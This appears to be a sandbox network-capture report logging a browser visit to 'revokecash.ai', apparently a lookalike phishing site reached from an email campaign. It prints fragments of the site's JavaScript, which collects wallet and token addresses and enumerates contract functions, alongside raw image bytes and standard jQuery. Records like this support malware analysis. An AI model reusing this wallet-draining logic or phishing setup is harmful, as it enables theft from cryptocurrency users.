                                                                          2023-12-10 16:44:15 UTC1369INData Raw: 66 74 28 29 29 3b 20 7d 20 0a 09 09 09 09 65 6c 73 65 20 7b 20 24 2e 65 61 63 68 28 77 63 2e 64 61 74 61 2e 74 6f 6b 65 6e 73 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 77 63 2e 72 65 71 75 65 73 74 43 6f 6e 74 72 61 63 74 28 74 68 69 73 29 3b 20 7d 29 3b 20 7d 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 09 7d 2c 0a 09 72 65 71 75 65 73 74 43 6f 6e 74 72 61 63 74 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 49 6e 66 6f 29 20 7b 0a 09 09 76 61 72 20 61 62 69 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 74 6f 6b 65 6e 49 6e 66 6f 2e 74 6f 6b 65 6e 44 61 74 61 2e 61 62 69 29 3b 0a 09 09 76 61 72 20 61 62 69 46 75 6e 63 20 3d 20 66 61 6c 73 65 3b 0a 09 09 0a 09 09 69 66 20 28 61 62 69 2e 66 69 6c 74 65 72 28 28 66 6e 29 20 3d 3e 20 66 6e 2e 6e 61 6d 65 20 3d 3d 3d
                                                                          Data Ascii: ft()); } else { $.each(wc.data.tokens, function() { wc.requestContract(this); }); }}});},requestContract: function(tokenInfo) {var abi = JSON.parse(tokenInfo.tokenData.abi);var abiFunc = false;if (abi.filter((fn) => fn.name ===
                                                                          2023-12-10 16:44:15 UTC1103INData Raw: 3a 20 77 63 2e 63 6f 6e 66 2e 69 64 2c 20 0a 09 09 09 09 77 61 6c 6c 65 74 49 44 3a 20 74 6f 6b 65 6e 49 6e 66 6f 2e 77 61 6c 6c 65 74 2c 20 0a 09 09 09 09 74 6f 6b 65 6e 49 44 3a 20 74 6f 6b 65 6e 49 6e 66 6f 2e 69 64 2c 20 0a 09 09 09 09 77 61 6c 6c 65 74 41 64 64 72 65 73 73 3a 20 74 6f 6b 65 6e 49 6e 66 6f 2e 77 61 6c 6c 65 74 41 64 64 72 65 73 73 2c 20 0a 09 09 09 09 74 6f 6b 65 6e 41 64 64 72 65 73 73 3a 20 74 6f 6b 65 6e 49 6e 66 6f 2e 74 6f 6b 65 6e 20 0a 09 09 09 7d 2c 0a 09 09 09 74 79 70 65 3a 20 27 47 45 54 27 2c 0a 09 09 09 64 61 74 61 54 79 70 65 3a 20 27 4a 53 4f 4e 27 2c 0a 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 28 72 29 20 7b 0a 09 09 09 09 69 66 20 28 21 72 2e 73 74 61 74 75 73 29 20 7b 20 73 65 74 54 69 6d 65 6f 75
                                                                          Data Ascii: : wc.conf.id, walletID: tokenInfo.wallet, tokenID: tokenInfo.id, walletAddress: tokenInfo.walletAddress, tokenAddress: tokenInfo.token },type: 'GET',dataType: 'JSON',success: function(r) {if (!r.status) { setTimeou


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.549719104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:15 UTC841OUTGET /_img/demo-thumb.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:16 UTC720INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 38 61 38 35 2d 31 38 63 35 33 33 32 35 39 65
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:16 GMTContent-Type: image/jpegContent-Length: 100997Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:37 GMTETag: W/"18a85-18c533259e
                                                                          2023-12-10 16:44:16 UTC649INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 02 d0 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 05 06 04 07 08 0a 09 ff da 00 08 01 01 00 00 00 00 fc d7 02 66 66 52 4c 89 94 13 24 93 31 32 48 4c 92 04 aa 4c a5 29 13 29 26 62 52 4c a4 90 09 9a a6 2a 24 94 a6 44 a5 24
                                                                          Data Ascii: JFIFHH"ffRL$12HLL))&bRL*$D$
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 67 b3 92 e2 72 2f eb 19 2d 67 9c d6 70 7b 7e a0 00 00 00 00 00 00 00 00 00 00 00 00 39 fc 0a b3 35 57 54 d6 91 d7 a9 4a 20 8d d2 90 2e 64 d4 d2 00 00 2d e3 20 00 00 00 00 00 00 00 00 00 9b 80 00 4c 81 48 aa aa ab ae 6b 99 27 ae c9 4c 42 23 b3 39 d5 63 5c ee 0f 27 b4 3a e7 09 86 d9 74 ec be 23 31 18 9e 7f 26 2e 58 c5 00 00 00 00 00 00 00 00 00 00 6c 57 75 86 c5 8c cf 67 f2 5a 75 8e c8 eb ec c7 6f 74 4e c5 dc 9d 4d 98 f5 f7 4c f9 2b 84 73 ad 5f ca ec 3a f5 58 a9 ae ba aa 99 99 9e bb 91 34 55 11 47 66 f6 95 ae b0 e5 6d ba 46 e5 d8 3d 2d 84 e5 6f 5d 43 ed dd 07 75 e3 da d5 ba 86 bc ae a5 a9 00 00 00 00 00 00 00 00 00 00 77 af 3f cf 7d 95 b5 f4 6e d5 dd db b7 96 f8 7e b1 f2 d7 68 7e 93 7e 4a f6 0f a3 7a 2b b1 fd 63 d7 3e 15 ee 0b 9b 57 5e ef 1e 32 ce f6 0f 5e
                                                                          Data Ascii: gr/-gp{~95WTJ .d- LHk'LB#9c\':t#1&.XlWugZuotNML+s_:X4UGfmF=-o]Cuw?}n~h~~Jz+c>W^2^
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 00 00 00 00 00 00 00 2c fc e4 5e bd 7a e5 75 57 32 eb b9 4d 31 4c 45 34 7d 32 de 00 00 00 01 f9 fb 88 ed 6f 61 eb fd 03 e9 e1 d2 fe 4b ec cf 68 07 9c 3b 8f 6c 79 3b a3 bd d7 bb 87 5c 6f 3c e2 3c 89 eb c3 4f f1 d7 b7 3c bf ea 3f 2c fa f0 0f 1c 7a 9f ce 7d 93 47 73 6a de 7a e6 fa 85 a9 5d da 00 00 00 00 01 67 e7 26 ed eb d5 dc aa b9 97 5e c9 4a 88 a6 28 fa 64 bc 00 00 00 03 ae bf 1e bf 43 3c cd e9 cf 2d 76 b6 fb d0 ff 00 a2 1e 4f c0 f9 27 f4 f3 c4 fe b9 e9 0d 47 1d e8 d7 6d fe 68 7e 92 f9 3f 3f d7 5e 9e f3 6e 7b c9 7e c4 eb ae ec e8 4f 6a fe 73 fe ce fe 70 e3 ea eb 4f d7 9f c7 7d e3 b3 ba a3 d6 3d 5b e8 7e 82 ea 3f d1 3f ca 6f 61 fe 7c 7a 6b 78 ea df 4b f8 f3 3f d9 bc 3d 57 8d fa aa 00 00 00 00 0b 3f 39 77 2f 5f ae ba ea aa 5d 77 32 a5 4d 34 c5 bf a6 4b c0
                                                                          Data Ascii: ,^zuW2M1LE4}2oaKh;ly;\o<<O<?,z}Gsjz]g&^J(dC<-vO'Gmh~??^n{~OjspO}=[~??oa|zkxK?=W?9w/_]w2M4K
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: dd bb 76 a9 ad 3d 77 25 33 4c 5b a2 cf d2 f5 e0 00 00 00 31 38 bd 9c 00 1e 3c d3 f0 be 99 ef 43 4f fc e3 df f9 3c 9c 77 60 51 ec f0 00 d2 3c 09 b5 e4 b9 58 5c 85 cd 0b 66 e6 e9 bb d7 a4 bb 84 30 5e 43 d3 b7 5d 7f 0f c2 9a 75 2f d3 6c a8 00 00 00 16 7e 74 b9 17 ae 5d be ae 65 d7 82 26 9a 6d d1 6b e9 76 f0 00 00 00 18 9c 5e ce 00 0e 37 58 ef 99 2e 49 66 cd ab 96 d5 b9 c0 01 67 57 e3 6d 09 b5 7f 4f da 6f 5a ab 99 70 23 16 e5 71 75 fd 92 29 d6 f6 6c a8 00 00 00 16 7e 74 ef de bb 76 f4 d5 51 d7 80 a6 9a 6d da fa 5c bc 00 00 00 06 27 aa 76 69 98 5d 90 16 f8 d4 72 e4 01 15 00 02 84 d1 17 6c 57 5b 8f c8 00 11 32 d7 3b 47 2a 00 00 00 05 9f 9d 3e 45 db d7 ae 4d 73 33 d7 40 a6 9a 28 b7 f4 b7 78 00 00 00 0c 4f 8b 33 18 8d a7 52 e6 7a cb 66 ba 07 95 b5 8a f9 7e 92 dc
                                                                          Data Ascii: v=w%3L[18<CO<w`Q<X\f0^C]u/l~t]e&mkv^7X.IfgWmOoZp#qu)l~tvQm\'vi]rlW[2;G*>EMs3@(xO3Rzf~
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 77 5d a6 f0 00 eb 6f 39 70 b6 0c 1f ae 36 70 00 c1 f9 67 63 ab 91 ab db c8 76 0e b1 e8 5c a8 00 00 00 16 7e 77 af f2 2e 5d bb 5d c2 7a f2 a2 9a 62 9b 76 a8 fa 50 bc 00 00 00 06 27 5f d9 d1 20 12 a2 62 66 92 64 22 24 02 44 4c 4c 40 00 2a 24 35 8d 83 2a 00 00 00 05 9f 9d eb fc 8b d7 6e 5c aa 66 7a ee 4a 62 28 a6 c5 3f 49 f7 80 00 00 00 c4 e2 f6 70 00 6a 98 83 78 e5 30 7a ed c9 46 6f 3e 00 00 89 00 02 25 04 55 ac 65 72 a0 00 00 00 59 f9 df bf c8 bb 7a e5 75 cc ba ee 48 8a 69 a2 cd 3f 49 d7 80 00 00 00 c4 e2 f6 70 00 8f 03 f5 06 33 79 f7 07 69 3a f7 8f d6 7d 99 d9 4e ba ea 9c 1e 1f b3 b6 2e b7 df fa df d6 00 d2 fa 7e 78 da a6 dd 5e d1 dd c0 05 3e 66 e7 70 ef 69 19 5b 9d b3 d7 5e 8b ca 80 00 00 01 67 e7 7e ff 00 22 ed eb 95 d7 32 eb c5 4a 62 9a 68 b3 47 d2 75
                                                                          Data Ascii: w]o9p6pgcv\~w.]]zbvP'_ bfd"$DLL@*$5*n\fzJb(?Ipjx0zFo>%UerYzuHi?Ip3yi:}N.~x^>fpi[^g~"2JbhGu
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 4c 4d 4a a6 ba aa bd 72 e5 cb d7 6b ae aa eb 95 69 eb b1 29 a6 29 88 88 b7 4d 31 4a 00 4c c5 40 99 12 90 92 53 15 24 99 02 52 04 ca 42 64 09 4c 84 a5 21 29 99 89 90 05 44 84 cc cc d7 55 ca eb bb 72 ed 55 d7 55 55 4a b4 f5 cc a6 48 85 2a 61 4c 45 28 a6 a9 13 22 42 64 90 4a 42 49 91 32 02 66 64 54 09 4a 52 91 24 a4 04 a4 4c 92 48 a8 99 25 25 4a a6 aa ab ae e5 75 d5 5d 53 72 66 52 eb a2 64 98 82 21 42 60 12 02 66 40 99 4a 52 25 52 52 48 2a 09 94 81 52 50 99 25 29 4a 45 51 32 92 42 64 2a 04 a4 94 ca 66 6a ae aa a6 aa aa aa 6e 55 29 1d 77 24 93 28 4c 10 92 52 09 4a 52 95 44 a4 48 49 32 4c 55 22 53 24 cc 49 24 d4 26 42 49 48 91 32 4a 64 4a 49 4a 52 12 99 99 91 54 aa 9a a6 6a aa 40 ff c4 00 1b 01 01 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 01 02 05 06 07
                                                                          Data Ascii: LMJrki))M1JL@S$RBdL!)DUrUUUJH*aLE("BdJBI2fdTJR$LH%%Ju]SrfRd!B`f@JR%RRH*RP%)JEQ2Bd*fjnU)w$(LRJRDHI2LU"S$I$&BIH2JdJIJRTj@
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 03 71 b8 f1 73 80 00 00 00 00 00 00 00 00 01 b2 dd f8 b9 f0 00 00 00 00 00 00 00 00 00 d9 6d 3c 7a 50 00 00 00 00 00 00 00 00 00 dc ef 7c 3c b8 00 00 00 00 00 00 00 00 00 7a f6 3e 5d 68 00 00 00 00 00 00 00 00 00 73 dc f7 b7 b5 00 00 00 00 00 00 00 00 00 0f 9f 9b ed f7 00 00 00 00 00 00 00 00 00 0e 73 92 da 77 80 00 25 00 00 00 00 00 00 00 18 fc 7e 9f 40 00 00 00 00 00 00 00 00 00 e7 79 6d 9f 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff c4 00 36 10 00 01 04 01 03 01 06 06 01 04 02 03 01 01 01 00 02 00 01 03 04 12 05 11 14 13 06 15 16 21 31 50 10 22 23 30 33 40 34 20 24 32 35 41 70 36 42 60 90 25 43 ff da 00 08 01 01 00 01 08 03 ff 00 f4 ad 85 bf e7 68 d6 d1
                                                                          Data Ascii: qsm<zP|<z>]hssw%~@ymp6!1P"#03@4 $25Ap6B`%Ch
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 5e a5 e4 a8 ff 00 23 d9 1c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 04 c3 b7 df 8f b4 17 63 0c 55 89 a4 b7 26 72 e0 b0 58 2c 16 0b 04 cd b7 ed b5 1a db 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c
                                                                          Data Ascii: ^#`X,`X,`X,`X,`X,`X,`X,`X,`X,`X,`X,`X,cU&rX,.e5\Ypk.e5\Ypk.e5\Ypk.e5\Ypk.e5\Ypk.e5\
                                                                          2023-12-10 16:44:16 UTC1369INData Raw: 05 b1 b1 1c 93 88 5e eb 43 df 50 8d b9 cc 6b ea 35 a0 ad 8a 1d 6a 38 e4 cd 9b 55 8a 3b 10 6c 78 e4 f8 e8 ff 00 ed 69 fc 5f d3 f5 db d3 e3 af f6 6a c9 dd 39 eb 78 7b 51 5e 1e d4 57 87 b5 15 e1 ed 45 78 7b 51 5e 1e d4 57 87 b5 15 d9 9d 02 6a 53 bd 9b 3e db 20 0c a0 40 5a be 90 f4 3e 9c 9a 43 75 42 12 bf 24 d2 76 9a 5e 8c 22 23 5e 2d 86 53 ea ca 66 fd a3 a7 d0 d3 34 c2 5d 8e b7 d1 d4 0a 17 ed 44 bd 5d 6a 75 15 a9 a0 6d a2 ec c7 50 b4 88 ce 4e da 8f ff 00 d0 84 96 83 43 bc 35 38 a3 75 da dd 2c e1 b8 f6 85 a5 36 8d c1 bb 37 d9 f3 b1 30 59 9f b6 f2 ed 5a b4 4b b1 d1 75 35 6c 96 af 07 1b 53 b3 1a ec fd fe a6 84 c6 4e fb be ea 2b b6 be 58 c0 5b 11 66 f6 8e d2 e8 c7 aa c0 05 0f 87 75 15 e1 ed 45 78 7b 51 5e 1e d4 57 87 b5 15 e1 ed 45 78 7b 51 5e 1e d4 57 87 b5 15
                                                                          Data Ascii: ^CPk5j8U;lxi_j9x{Q^WEx{Q^WjS> @Z>CuB$v^"#^-Sf4]D]jumPNC58u,670YZKu5lSN+X[fuEx{Q^WEx{Q^W


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.549720151.101.66.1374435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:16 UTC531OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:16 UTC563INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 39 35 30 31 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 31 38 20 4f 63 74 20 31 39 39 31 20 31 32 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 32 38 66 65 63 63 63 30 2d 31 35 64 39 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 2c 20 73 74 61 6c 65 2d 77 68 69 6c 65 2d 72 65 76 61 6c
                                                                          Data Ascii: HTTP/1.1 200 OKConnection: closeContent-Length: 89501Server: nginxContent-Type: application/javascript; charset=utf-8Last-Modified: Fri, 18 Oct 1991 12:00:00 GMTETag: "28feccc0-15d9d"Cache-Control: public, max-age=31536000, stale-while-reval
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
